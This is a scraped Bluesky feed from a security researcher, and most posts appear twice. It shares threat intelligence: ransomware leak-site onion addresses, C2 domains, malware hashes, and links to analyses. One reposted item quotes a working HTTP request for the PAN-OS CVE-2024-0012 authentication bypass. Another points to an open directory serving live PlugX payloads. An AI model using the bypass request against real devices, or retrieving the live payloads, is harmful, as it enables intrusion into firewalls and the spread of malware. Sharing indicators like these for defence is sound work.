Mimi_Sec
@mimisec.bsky.social
Ol' USAF Cyber. Ima say it. Own views. I learned I don't know anything. He/Him. Just the plumber.
Pinned
Mimi_Sec
@mimisec.bsky.social
· Nov 15
Just gonna reiterate I'll be the first to admit I don't know much, but if anyone ever needs any help in learning infosec type stuff, I'm all for lending a hand 😀 (also if i don't know the immediate answer, I'll learn right along with you.)
Credit:AlvieriD
Bluebox Ransomware DLS
zu3wfrmrkl4ltqqnpt3owp3cwa33rqwod4gpe3ttb5o4vf2is2gzm6qd[.]onion
Bluebox Ransomware DLS
zu3wfrmrkl4ltqqnpt3owp3cwa33rqwod4gpe3ttb5o4vf2is2gzm6qd[.]onion
December 11, 2024 at 1:51 PM
Credit:AlvieriD
Bluebox Ransomware DLS
zu3wfrmrkl4ltqqnpt3owp3cwa33rqwod4gpe3ttb5o4vf2is2gzm6qd[.]onion
Bluebox Ransomware DLS
zu3wfrmrkl4ltqqnpt3owp3cwa33rqwod4gpe3ttb5o4vf2is2gzm6qd[.]onion
Socgolish Domain:
*.material[.]amstillroofing[.]com
*.material[.]amstillroofing[.]com
December 10, 2024 at 7:40 PM
Socgolish Domain:
*.material[.]amstillroofing[.]com
*.material[.]amstillroofing[.]com
Reposted by Mimi_Sec
"We can now share that our latest investigation also found links between some of Doppelganger’s activities and individuals associated with MGIMO (Moscow State Institute of International Relations)."
via Meta/PDF: scontent.fotp7-2.fna.fbcdn.net/v/t39.8562-6...
via Meta/PDF: scontent.fotp7-2.fna.fbcdn.net/v/t39.8562-6...
December 4, 2024 at 10:49 PM
"We can now share that our latest investigation also found links between some of Doppelganger’s activities and individuals associated with MGIMO (Moscow State Institute of International Relations)."
via Meta/PDF: scontent.fotp7-2.fna.fbcdn.net/v/t39.8562-6...
via Meta/PDF: scontent.fotp7-2.fna.fbcdn.net/v/t39.8562-6...
Reposted by Mimi_Sec
decoy on Security_Alert-US_MISSION_TO_PAKISTAN.pdf.lnk, beat by yogesh across the river by 31 minutes 😐
c2 vorm.vormliebe[.]club
d60e979ee44c9dc16e36657ec3a41016627cc685965befed018058986dd5d45e
c2 vorm.vormliebe[.]club
d60e979ee44c9dc16e36657ec3a41016627cc685965befed018058986dd5d45e
December 4, 2024 at 12:05 PM
decoy on Security_Alert-US_MISSION_TO_PAKISTAN.pdf.lnk, beat by yogesh across the river by 31 minutes 😐
c2 vorm.vormliebe[.]club
d60e979ee44c9dc16e36657ec3a41016627cc685965befed018058986dd5d45e
c2 vorm.vormliebe[.]club
d60e979ee44c9dc16e36657ec3a41016627cc685965befed018058986dd5d45e
Reposted by Mimi_Sec
More great examples why you need to give employees a trusted PDF tool
pdfskillspro[.]com
pdskillsapp[.]com
Literally uploads files to their servers while saying they don't.
pdfskillspro[.]com
pdskillsapp[.]com
Literally uploads files to their servers while saying they don't.
December 4, 2024 at 12:33 PM
More great examples why you need to give employees a trusted PDF tool
pdfskillspro[.]com
pdskillsapp[.]com
Literally uploads files to their servers while saying they don't.
pdfskillspro[.]com
pdskillsapp[.]com
Literally uploads files to their servers while saying they don't.
FunkSec Ransomware DLS
7ixfdvqb4eaju5lzj4gg76kwlrxg4ugqpuog5oqkkmgfyn33h527oyyd[.]onion
7ixfdvqb4eaju5lzj4gg76kwlrxg4ugqpuog5oqkkmgfyn33h527oyyd[.]onion
December 4, 2024 at 4:42 PM
FunkSec Ransomware DLS
7ixfdvqb4eaju5lzj4gg76kwlrxg4ugqpuog5oqkkmgfyn33h527oyyd[.]onion
7ixfdvqb4eaju5lzj4gg76kwlrxg4ugqpuog5oqkkmgfyn33h527oyyd[.]onion
Reposted by Mimi_Sec
I try to write technical blogs regularly on topics I’m interested in. Recently this has been a lot of reverse engineering, Bluetooth, and networking hacks. But there’s many other goodies too!
As I’m invested in this aspect of bsky succeeding, here’s a thread of my posts. Comments encouraged!
As I’m invested in this aspect of bsky succeeding, here’s a thread of my posts. Comments encouraged!
December 2, 2024 at 6:54 PM
I try to write technical blogs regularly on topics I’m interested in. Recently this has been a lot of reverse engineering, Bluetooth, and networking hacks. But there’s many other goodies too!
As I’m invested in this aspect of bsky succeeding, here’s a thread of my posts. Comments encouraged!
As I’m invested in this aspect of bsky succeeding, here’s a thread of my posts. Comments encouraged!
Reposted by Mimi_Sec
Initial Access Detection Opportunities
🖥️ Quickassist detection: x.com/mthcht/statu...
✉️High volume of external emails sent to a single recipient
💬Teams interaction with a foreign tenant x.com/mthcht/statu... x.com/hir3n_s/stat...
filter on usernames with IT,Help,Desk,support,Tech,Customer,Microsoft
🖥️ Quickassist detection: x.com/mthcht/statu...
✉️High volume of external emails sent to a single recipient
💬Teams interaction with a foreign tenant x.com/mthcht/statu... x.com/hir3n_s/stat...
filter on usernames with IT,Help,Desk,support,Tech,Customer,Microsoft
November 29, 2024 at 9:14 AM
Initial Access Detection Opportunities
🖥️ Quickassist detection: x.com/mthcht/statu...
✉️High volume of external emails sent to a single recipient
💬Teams interaction with a foreign tenant x.com/mthcht/statu... x.com/hir3n_s/stat...
filter on usernames with IT,Help,Desk,support,Tech,Customer,Microsoft
🖥️ Quickassist detection: x.com/mthcht/statu...
✉️High volume of external emails sent to a single recipient
💬Teams interaction with a foreign tenant x.com/mthcht/statu... x.com/hir3n_s/stat...
filter on usernames with IT,Help,Desk,support,Tech,Customer,Microsoft
Reposted by Mimi_Sec
RomCom/Storm-0978 exploits Firefox and Windows zero days in the wild
Firefox 0day CVE-2024-9680 + Windows privilege escalation 0day CVE‑2024‑49039
welivesecurity.com/en/eset-rese...
Firefox 0day CVE-2024-9680 + Windows privilege escalation 0day CVE‑2024‑49039
welivesecurity.com/en/eset-rese...
November 27, 2024 at 7:56 AM
RomCom/Storm-0978 exploits Firefox and Windows zero days in the wild
Firefox 0day CVE-2024-9680 + Windows privilege escalation 0day CVE‑2024‑49039
welivesecurity.com/en/eset-rese...
Firefox 0day CVE-2024-9680 + Windows privilege escalation 0day CVE‑2024‑49039
welivesecurity.com/en/eset-rese...
Reposted by Mimi_Sec
GET /php/ztp_gate.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
GTFO! Come on, they are laughing at us now.
labs.watchtowr.com/pots-and-pan...
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
GTFO! Come on, they are laughing at us now.
labs.watchtowr.com/pots-and-pan...
Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
Note: Since this is 'breaking' news and more details are being released, we're updating this post as more details become available (and as we think of better memes). Mash that F5 key every so often fo...
labs.watchtowr.com
November 19, 2024 at 10:17 AM
GET /php/ztp_gate.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
GTFO! Come on, they are laughing at us now.
labs.watchtowr.com/pots-and-pan...
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
GTFO! Come on, they are laughing at us now.
labs.watchtowr.com/pots-and-pan...
Reposted by Mimi_Sec
New Helldown ransomware targets Windows and Linux systems, uses Zyxel firewall exploits for initial access
blog.sekoia.io/helldown-ran...
Helldown Ransomware: an overview of this emerging threat
Comprehensive Analysis of Helldown: Tactics, Techniques, and Procedures (TTPs) and Exploitation of Zyxel Vulnerabilities %
blog.sekoia.io
November 19, 2024 at 10:43 AM
New Helldown ransomware targets Windows and Linux systems, uses Zyxel firewall exploits for initial access
blog.sekoia.io/helldown-ran...
Reposted by Mimi_Sec
Reposted by Mimi_Sec
🚨🇺🇸Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware
darkwebinformer.com/sealevel-con...
darkwebinformer.com/sealevel-con...
Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware
Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware
darkwebinformer.com
November 18, 2024 at 8:06 PM
🚨🇺🇸Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware
darkwebinformer.com/sealevel-con...
darkwebinformer.com/sealevel-con...
Reposted by Mimi_Sec
The certificate on this malware caught my eye. 👀
Starts with Google Ad, malware signed by Microsoft, and ends in support scam.
It checks if Quickbooks is running, checks the day of week, tells you to call a "support" number before killing Quickbooks.
www.malwarebytes.com/blog/scams/2...
Starts with Google Ad, malware signed by Microsoft, and ends in support scam.
It checks if Quickbooks is running, checks the day of week, tells you to call a "support" number before killing Quickbooks.
www.malwarebytes.com/blog/scams/2...
QuickBooks popup scam still being delivered via Google ads | Malwarebytes
When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.
www.malwarebytes.com
November 18, 2024 at 5:42 PM
The certificate on this malware caught my eye. 👀
Starts with Google Ad, malware signed by Microsoft, and ends in support scam.
It checks if Quickbooks is running, checks the day of week, tells you to call a "support" number before killing Quickbooks.
www.malwarebytes.com/blog/scams/2...
Starts with Google Ad, malware signed by Microsoft, and ends in support scam.
It checks if Quickbooks is running, checks the day of week, tells you to call a "support" number before killing Quickbooks.
www.malwarebytes.com/blog/scams/2...
Reposted by Mimi_Sec
You all know what to do
November 18, 2024 at 3:06 PM
You all know what to do
Reposted by Mimi_Sec
if plugx is your game, open dir with live payloads
103.43.18[.]71:88 #apt #malware
files archived here for homegamers github.com/StrikeReady-...
103.43.18[.]71:88 #apt #malware
files archived here for homegamers github.com/StrikeReady-...
November 16, 2024 at 3:58 PM
if plugx is your game, open dir with live payloads
103.43.18[.]71:88 #apt #malware
files archived here for homegamers github.com/StrikeReady-...
103.43.18[.]71:88 #apt #malware
files archived here for homegamers github.com/StrikeReady-...
Reposted by Mimi_Sec
#sidewinder #apt targeting singapore with "sg customs" lure
c2 advisories-sgcustoms.d0cumentview[.]info
40159fcfe9793a8a13111131e31f10eb1652343f6b9d172e2cadc821bc5f28fd (uploaded from SG)
NO-712024.docx
c2 advisories-sgcustoms.d0cumentview[.]info
40159fcfe9793a8a13111131e31f10eb1652343f6b9d172e2cadc821bc5f28fd (uploaded from SG)
NO-712024.docx
November 18, 2024 at 2:15 PM
#sidewinder #apt targeting singapore with "sg customs" lure
c2 advisories-sgcustoms.d0cumentview[.]info
40159fcfe9793a8a13111131e31f10eb1652343f6b9d172e2cadc821bc5f28fd (uploaded from SG)
NO-712024.docx
c2 advisories-sgcustoms.d0cumentview[.]info
40159fcfe9793a8a13111131e31f10eb1652343f6b9d172e2cadc821bc5f28fd (uploaded from SG)
NO-712024.docx
Reposted by Mimi_Sec
Smokeloader keeps crawling its way back into the limelight. If you want a primer on it, I gave a public talk on it 2 years ago
www.youtube.com/watch?v=O69e...
www.youtube.com/watch?v=O69e...
Smokeloader: The Pandora’s box of tricks, payloads and anti-analysis - BSides Portland 2022
YouTube video by BSides Portland
www.youtube.com
November 16, 2024 at 3:42 AM
Smokeloader keeps crawling its way back into the limelight. If you want a primer on it, I gave a public talk on it 2 years ago
www.youtube.com/watch?v=O69e...
www.youtube.com/watch?v=O69e...
Reposted by Mimi_Sec
Using EclecticIQ’s analysis, I uncovered 39 additional domains linked to Chinese #ThreatActor #SilkSpecter, impersonating brands like IKEA, The North Face, Zalando and Zara.
Key IOCs:
trusttollsvg.js
collect.js
#ThreatIntel #OSINT #Scam #BlackFriday #Phishing
blog.eclecticiq.com/inside-intel...
Key IOCs:
trusttollsvg.js
collect.js
#ThreatIntel #OSINT #Scam #BlackFriday #Phishing
blog.eclecticiq.com/inside-intel...
November 18, 2024 at 10:59 AM
Using EclecticIQ’s analysis, I uncovered 39 additional domains linked to Chinese #ThreatActor #SilkSpecter, impersonating brands like IKEA, The North Face, Zalando and Zara.
Key IOCs:
trusttollsvg.js
collect.js
#ThreatIntel #OSINT #Scam #BlackFriday #Phishing
blog.eclecticiq.com/inside-intel...
Key IOCs:
trusttollsvg.js
collect.js
#ThreatIntel #OSINT #Scam #BlackFriday #Phishing
blog.eclecticiq.com/inside-intel...
Reposted by Mimi_Sec
🚨New Ransomware Group, "Termite," has named their first 5 victims
termiteuslbumdge2zmfmfcsrvmvsfe4gvyudc5j6cdnisnhtftvokid[.]onion
termiteuslbumdge2zmfmfcsrvmvsfe4gvyudc5j6cdnisnhtftvokid[.]onion
November 17, 2024 at 7:51 PM
🚨New Ransomware Group, "Termite," has named their first 5 victims
termiteuslbumdge2zmfmfcsrvmvsfe4gvyudc5j6cdnisnhtftvokid[.]onion
termiteuslbumdge2zmfmfcsrvmvsfe4gvyudc5j6cdnisnhtftvokid[.]onion
Reposted by Mimi_Sec
May 13, 2024 blogpost
It is common for malware to be signed with code signing certificates.
How is this possible? Impostors receive the cert directly and sign malware.
In this blog-post, we look at 100 certs used by #Solarmarker #malware to learn more.
squiblydoo.blog/2024/05/13/i...
It is common for malware to be signed with code signing certificates.
How is this possible? Impostors receive the cert directly and sign malware.
In this blog-post, we look at 100 certs used by #Solarmarker #malware to learn more.
squiblydoo.blog/2024/05/13/i...
Impostor Certificates
It is common for malware to be signed with code signing certificates. How is this possible? Impostors receive the cert directly and sign malware. In this blog-post, we look at 100 certs used by Sol…
squiblydoo.blog
November 17, 2024 at 1:33 PM
May 13, 2024 blogpost
It is common for malware to be signed with code signing certificates.
How is this possible? Impostors receive the cert directly and sign malware.
In this blog-post, we look at 100 certs used by #Solarmarker #malware to learn more.
squiblydoo.blog/2024/05/13/i...
It is common for malware to be signed with code signing certificates.
How is this possible? Impostors receive the cert directly and sign malware.
In this blog-post, we look at 100 certs used by #Solarmarker #malware to learn more.
squiblydoo.blog/2024/05/13/i...
Said it once I'll say it again, UFO 50 and Animal Well are masterpieces worth every minute.
November 17, 2024 at 6:26 AM
Said it once I'll say it again, UFO 50 and Animal Well are masterpieces worth every minute.